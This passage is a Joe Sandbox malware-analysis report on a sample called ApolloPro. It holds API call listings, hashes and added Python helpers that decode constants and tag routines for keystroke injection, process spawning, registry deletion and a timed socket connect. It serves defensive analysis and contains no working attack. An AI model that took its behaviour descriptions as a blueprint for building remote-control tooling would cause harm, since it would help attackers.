                                                                                                • Part of subcall function 006B1602: FreeLibrary.KERNEL32(?), ref: 006B16CA
                                                                                                • Part of subcall function 006B1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006B16ED
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 006B16B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 395352322-0
                                                                                              • Opcode ID: deac25e5aac1a4ba922d09d3efe88acced85991cdf6f0132f35b6fe57814c8a2
                                                                                              • Instruction ID: f190a6e5e2c8199bf70f33723280b4bc94322071b107e160eee8ac1155e0e981
                                                                                              • Opcode Fuzzy Hash: deac25e5aac1a4ba922d09d3efe88acced85991cdf6f0132f35b6fe57814c8a2
                                                                                              • Instruction Fuzzy Hash: B8314BB1900109FFEB148F90DC99EFFB7BDEF09300F540169E501A6240EA709E859BA4
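The per-function API listings above (the ShellExecuteExW/GetProcessId spawn routine, the two GetKeyboardState/SetKeyboardState/PostMessageW routines, the MoveFileW/SHFileOperationW routine and the RegEnumKeyExW/RegDeleteKeyW routine) share one line format: "• Name.MODULE(args), ref: ADDR", with subcalls marked "Part of subcall function". The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses that format, decodes the PostMessageW message and wParam values using the Windows SDK constants (0x100 = WM_KEYDOWN, 0x101 = WM_KEYUP, 0x10 = VK_SHIFT, 0x11 = VK_CONTROL, 0x12 = VK_MENU, 0x5B = VK_LWIN), and tags each routine with a coarse behaviour label. The rule names and the heuristics behind them are my own assumptions for triage, not Joe Sandbox signatures; the sample input is constructed by copying listing lines from this report.

```python
"""Parse Joe Sandbox per-function API listings and tag RAT-like API sequences."""
import re
from dataclasses import dataclass
from typing import Optional

# One "• Name.MODULE(args), ref: ADDR" line; parentheses and the comma are optional
# (e.g. "_memset.LIBCMT ref: 006AFB31"), subcalls carry a "Part of subcall" prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows SDK constants (not assumptions): window messages and virtual-key codes.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                      # int for hex literals, None for "?"
    ref: int                        # address of the call site
    subcall_of: Optional[str] = None


def parse_args(text):
    """'?,00000101,00000010,?' -> [None, 0x101, 0x10, None]."""
    if not text or not text.strip():
        return []
    out = []
    for a in text.split(","):
        a = a.strip()
        try:
            out.append(None if a == "?" else int(a, 16))
        except ValueError:          # string literal or other non-hex argument
            out.append(a)
    return out


def parse_listing(text):
    """Split an excerpt into per-function call lists; a bare 'APIs' line starts a function."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            current.append(ApiCall(m["name"], m["module"], parse_args(m["args"]),
                                   int(m["ref"], 16), m["sub"]))
    return functions


def decode_posted_keys(calls):
    """PostMessageW(hwnd, msg, wParam, lParam) -> [(message name, key name), ...]."""
    keys = []
    for c in calls:
        if c.name == "PostMessageW" and len(c.args) >= 3 and c.args[1] in WM_NAMES:
            keys.append((WM_NAMES[c.args[1]], VK_NAMES.get(c.args[2], "?")))
    return keys


# Heuristic labels (my assumption): which API combinations are worth a second look.
RULES = {
    # Saving the modifier state, overwriting it and posting key messages to another
    # window is the shape of remote keystroke injection, not of ordinary UI code.
    "synthetic_keyboard_input": lambda names, calls:
        {"GetKeyboardState", "SetKeyboardState"} <= names and bool(decode_posted_keys(calls)),
    "spawns_process": lambda names, calls: {"ShellExecuteExW", "GetProcessId"} <= names,
    "recursive_registry_delete": lambda names, calls: {"RegEnumKeyExW", "RegDeleteKeyW"} <= names,
    "bulk_file_operation": lambda names, calls: bool({"SHFileOperationW", "MoveFileW"} & names),
}


def classify(calls):
    names = {c.name for c in calls}
    return sorted(rule for rule, pred in RULES.items() if pred(names, calls))


# Constructed sample: listing lines copied from this report's function entries.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 006AFB31
• ShellExecuteExW.SHELL32(?), ref: 006AFC3F
  • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
• GetProcessId.KERNEL32(00000000), ref: 006AFCB6
• CloseHandle.KERNEL32(00000000), ref: 006AFCE5
APIs
• GetParent.USER32(?), ref: 0069178B
• GetKeyboardState.USER32(?), ref: 006917A0
• SetKeyboardState.USER32(?), ref: 00691801
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0069182F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0069184E
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00691894
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 006918B7
APIs
• lstrcmpiW.KERNEL32(?,?), ref: 00693BAA
• MoveFileW.KERNEL32(?,?), ref: 00693BDE
• SHFileOperationW.SHELL32(?), ref: 00693C92
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006B1631
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B165B
• RegDeleteKeyW.ADVAPI32(?,?), ref: 006B16B5
"""

if __name__ == "__main__":
    for i, fn in enumerate(parse_listing(SAMPLE)):
        print(f"function {i} @ {fn[0].ref:08X}: {classify(fn)} {decode_posted_keys(fn)}")
```

Run against a full report export, the labels let you jump straight to the routines that implement the remote-control, persistence-cleanup and file-handling features instead of paging through every GUI helper; the decoded key names also show that the two keyboard routines differ only in WM_KEYDOWN versus WM_KEYUP, i.e. they press and release the same four modifiers.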
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006B6911
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000F0), ref: 006B6944
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000F0), ref: 006B6979
                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006B69AB
                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006B69D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006B69E6
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B6A00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: df76329f839c3215dcd8133f0b84dd4561988be2d17a3377ea66bbf6fb672fbc
                                                                                              • Instruction ID: 224fafe3ead0e42ebd14d348a0dce2a447040882617074b05e343211dfc358ff
                                                                                              • Opcode Fuzzy Hash: df76329f839c3215dcd8133f0b84dd4561988be2d17a3377ea66bbf6fb672fbc
                                                                                              • Instruction Fuzzy Hash: D33115B0604252AFEB21DF19DC88FA537E2FB4A755F1811A4F6148B2B2CB75AC80DB50
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E2CA
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E2F0
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0068E2F3
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E311
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0068E31A
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0068E33F
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E34D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 261203785ec953c6625d968c1da773afc919c9341bfc7b50e01afb43340d7764
                                                                                              • Instruction ID: 53bdd0e5e79c6c0d7c6efb7f8d35941e4e99643b1fb27454962dc4f89f7db5dd
                                                                                              • Opcode Fuzzy Hash: 261203785ec953c6625d968c1da773afc919c9341bfc7b50e01afb43340d7764
                                                                                              • Instruction Fuzzy Hash: E1218376604219EFAF10EFA8DC88CBB77EEEB09360B448225FA14DB250D671ED458760
                                                                                              APIs
                                                                                                • Part of subcall function 006A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006A68B1
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A68C0
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A68F9
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 006A6902
                                                                                              • WSAGetLastError.WSOCK32 ref: 006A690C
                                                                                              • closesocket.WSOCK32(00000000), ref: 006A6935
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A694E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 910771015-0
                                                                                              • Opcode ID: fc94a51903600b6f11665a1ec42bbab23e73ed7a77038479ac1e9a6c7dce3bba
                                                                                              • Instruction ID: e02033fc9ea2150d94fb59f82cdf65cbc60fcb0b3ddce60660c2febcc8adbdea
                                                                                              • Opcode Fuzzy Hash: fc94a51903600b6f11665a1ec42bbab23e73ed7a77038479ac1e9a6c7dce3bba
                                                                                              • Instruction Fuzzy Hash: 13318471600114AFEB10AF64DC85FBA77AEEF45725F08802DF905A7291DB74AC058FA1
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E3A5
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E3CB
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0068E3CE
                                                                                              • SysAllocString.OLEAUT32 ref: 0068E3EF
                                                                                              • SysFreeString.OLEAUT32 ref: 0068E3F8
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0068E412
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E420
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 8c5cc0506bb404a09c2c4988040008d05ab90b4328b29f9ba437b0ac1097bbe2
                                                                                              • Instruction ID: 03776dbb2364e6dead95deee445e465be96d61583bc4ac0e75925612e2104289
                                                                                              • Opcode Fuzzy Hash: 8c5cc0506bb404a09c2c4988040008d05ab90b4328b29f9ba437b0ac1097bbe2
                                                                                              • Instruction Fuzzy Hash: 1A218635605205EFAB10AFA8DC88DBF77EDEB0D360B008625F919CB2A1D671EC41CB64
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: 13da8b7adbe0fd17d5d014be860b7f900ed75a17e29ca948bc43ada5d7fb9b64
                                                                                              • Instruction ID: 4b81ffa4215c44f1bacc43782ea6ff208f3c50fda71c5e763df74d2ab5480ae4
                                                                                              • Opcode Fuzzy Hash: 13da8b7adbe0fd17d5d014be860b7f900ed75a17e29ca948bc43ada5d7fb9b64
                                                                                              • Instruction Fuzzy Hash: CC214C3210012276D331BB259C1AFF7739BDF55750F50463DF885872A3EB919D468399
                                                                                              APIs
                                                                                                • Part of subcall function 00632111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                                • Part of subcall function 00632111: GetStockObject.GDI32(00000011), ref: 00632163
                                                                                                • Part of subcall function 00632111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006B7C57
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006B7C64
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006B7C6F
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006B7C7E
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006B7C8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: 14a9adaaea2f13bb8f5283e41837b2c90d48dc2dbef4edfdfb63f9d2f82dabf5
                                                                                              • Instruction ID: 7d8d1e9a6a6733e41fc43b4a7972915e3153f3c37f3ef27cc2e231d6762d0b03
                                                                                              • Opcode Fuzzy Hash: 14a9adaaea2f13bb8f5283e41837b2c90d48dc2dbef4edfdfb63f9d2f82dabf5
                                                                                              • Instruction Fuzzy Hash: BB11B2B2150219BEEF159F60CC85EE77F5EEF48798F014115BB08A2191C772AC61DBA4
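                                                                                              The two listings above are easier to read once the raw constants are named: the WSOCK32 sequence at 006A68B1..006A694E is socket(AF_INET, SOCK_STREAM, IPPROTO_TCP), ioctlsocket(FIONBIO = 8004667E), connect with a 16-byte sockaddr_in, WSAGetLastError, then FIONBIO again, which is the connect-with-timeout idiom; the SendMessageW sequence at 006B7C57..006B7C8A sets up the Msctls_Progress32 control with PBM_SETBKCOLOR (0x2001), PBM_SETBARCOLOR (0x409), PBM_SETPOS (0x402), PBM_SETRANGE (0x401, lParam 00640000 = range 0..100) and PBM_SETSTEP (0x404). The Python helper below is an added example written for this report; it is not Joe Sandbox output and not code from the analysed sample. It parses the report's own bullet lines (the embedded sample input is copied from the two entries above), decodes the Winsock and PBM_* constants from the Windows SDK headers, and tags each function with the idiom its calls form. The tag names and function names are this example's own.

```python
"""Decode the argument constants in a Joe Sandbox "APIs" listing.

Added triage helper for this report; not Joe Sandbox output and not code from the sample.
Parses "• [Part of subcall function X: ]API.MODULE(args), ref: ADDR" lines and names the
Winsock / progress-bar constants (values from winsock2.h and commctrl.h).
"""
import re
from typing import List, NamedTuple, Optional, Set

# Constructed sample input: the two listings copied from the report.
SAMPLE_SOCKET = """\
  • Part of subcall function 006A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006A68B1
• WSAGetLastError.WSOCK32(00000000), ref: 006A68C0
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A68F9
• connect.WSOCK32(00000000,?,00000010), ref: 006A6902
• WSAGetLastError.WSOCK32 ref: 006A690C
• closesocket.WSOCK32(00000000), ref: 006A6935
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A694E
"""
SAMPLE_PROGRESS = """\
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006B7C57
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006B7C64
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006B7C6F
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006B7C7E
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006B7C8A
"""

# Windows SDK constants.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
FIONBIO = 0x8004667E                          # _IOW('f', 126, u_long)
IOCTL_CMDS = {FIONBIO: "FIONBIO", 0x4004667F: "FIONREAD"}
CLR_DEFAULT = 0xFF000000
WM_USER, CCM_FIRST = 0x0400, 0x2000
PBM_MSGS = {                                  # progress-bar control messages
    WM_USER + 1: "PBM_SETRANGE", WM_USER + 2: "PBM_SETPOS",
    WM_USER + 4: "PBM_SETSTEP", WM_USER + 9: "PBM_SETBARCOLOR",
    CCM_FIRST + 1: "PBM_SETBKCOLOR",          # alias of CCM_SETBKCOLOR
}
LINE_RE = re.compile(r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<api>\w+)"
                     r"\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


class Call(NamedTuple):
    api: str
    module: str
    args: list                                # int = hex constant, str = literal, None = "?"
    ref: int
    subcall_of: Optional[str]                 # set for "Part of subcall function" lines


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok) else tok


def parse(listing: str) -> List[Call]:
    """Turn the report's bullet lines into Call records; lines that do not match are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.search, listing.splitlines())):
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


def annotate(call: Call) -> Optional[str]:
    """Name the constants of one call, or None if nothing is known about it."""
    a = call.args
    if call.api == "socket" and len(a) >= 3:
        return f"socket({AF.get(a[0], a[0])}, {SOCK_TYPE.get(a[1], a[1])}, {PROTO.get(a[2], a[2])})"
    if call.api == "ioctlsocket" and len(a) >= 2 and isinstance(a[1], int):
        # argp is a pointer to the u_long mode flag, so the report cannot show whether
        # FIONBIO switched non-blocking mode on or off; only the command is recoverable.
        return f"ioctlsocket({IOCTL_CMDS.get(a[1], hex(a[1]))})"
    if call.api == "connect" and len(a) >= 3 and a[2] == 16:
        return "connect(namelen=16 -> sockaddr_in, IPv4)"
    if call.api.startswith("SendMessage") and len(a) >= 2 and isinstance(a[1], int):
        name = PBM_MSGS.get(a[1], hex(a[1]))
        lparam = a[3] if len(a) >= 4 and isinstance(a[3], int) else None
        if name == "PBM_SETRANGE" and lparam is not None:    # lParam = MAKELPARAM(low, high)
            return f"SendMessage({name}, range {lparam & 0xFFFF}..{lparam >> 16})"
        if name in ("PBM_SETBKCOLOR", "PBM_SETBARCOLOR") and lparam == CLR_DEFAULT:
            return f"SendMessage({name}, CLR_DEFAULT)"
        return f"SendMessage({name})"
    return None


def classify(calls: List[Call]) -> Set[str]:
    """Tag the function's own calls (subcalls excluded) with the idiom they form."""
    own = [c for c in calls if c.subcall_of is None]
    apis = {c.api for c in own}
    tags = set()
    # socket -> ioctlsocket(FIONBIO) -> connect -> WSAGetLastError is the connect-with-timeout
    # idiom: connect returns WSAEWOULDBLOCK, the caller polls, then restores blocking mode.
    if {"socket", "connect"} <= apis and any(
            c.api == "ioctlsocket" and len(c.args) > 1 and c.args[1] == FIONBIO for c in own):
        tags.add("nonblocking-connect")
    if any(c.api.startswith("SendMessage") and len(c.args) > 1 and c.args[1] in PBM_MSGS for c in own):
        tags.add("progress-bar")
    return tags


if __name__ == "__main__":                    # annotated dump of both listings
    print(*(f"{c.ref:08X} {annotate(c) or c.api}" for c in parse(SAMPLE_SOCKET + SAMPLE_PROGRESS)), sep="\n")
```

                                                                                              Two caveats when reading these entries. The third ioctlsocket argument in the report is the argp pointer, not the u_long it points to, so the listing alone does not prove which direction FIONBIO switched; the idiom (FIONBIO, connect, WSAGetLastError, FIONBIO again) is what identifies it as a timed connect. And the neighbouring entries in the same 00630000 module compare input against #OnAutoItStartRegister, #notrayicon and #requireadmin, which are AutoIt script directives, so the networking and progress-bar code listed here is consistent with the AutoIt runtime of a compiled script rather than hand-written payload code; the script's own behaviour is not visible in these API strings.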
                                                                                              APIs
                                                                                              • __init_pointers.LIBCMT ref: 00659D16
                                                                                                • Part of subcall function 006533B7: EncodePointer.KERNEL32(00000000), ref: 006533BA
                                                                                                • Part of subcall function 006533B7: __initp_misc_winsig.LIBCMT ref: 006533D5
                                                                                                • Part of subcall function 006533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0065A0D0
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0065A0E4
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0065A0F7
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0065A10A
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0065A11D
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0065A130
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0065A143
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0065A156
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0065A169
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0065A17C
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0065A18F
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0065A1A2
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0065A1B5
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0065A1C8
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0065A1DB
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0065A1EE
                                                                                              • __mtinitlocks.LIBCMT ref: 00659D1B
                                                                                              • __mtterm.LIBCMT ref: 00659D24
                                                                                                • Part of subcall function 00659D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00659D29,00657EFD,006ECD38,00000014), ref: 00659E86
                                                                                                • Part of subcall function 00659D8C: _free.LIBCMT ref: 00659E8D
                                                                                                • Part of subcall function 00659D8C: DeleteCriticalSection.KERNEL32(0Ro,?,?,00659D29,00657EFD,006ECD38,00000014), ref: 00659EAF
                                                                                              • __calloc_crt.LIBCMT ref: 00659D49
                                                                                              • __initptd.LIBCMT ref: 00659D6B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00659D72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                              • String ID:
                                                                                              • API String ID: 3567560977-0
                                                                                              • Opcode ID: 35a21e40a2b81de9758b837175022873cd86c43d5bc943926d2082e89295e3d8
                                                                                              • Instruction ID: cd1a4171f05b873c2d994a9ce70b42fd6b11ebcefebd622c117b409fdd7ce967
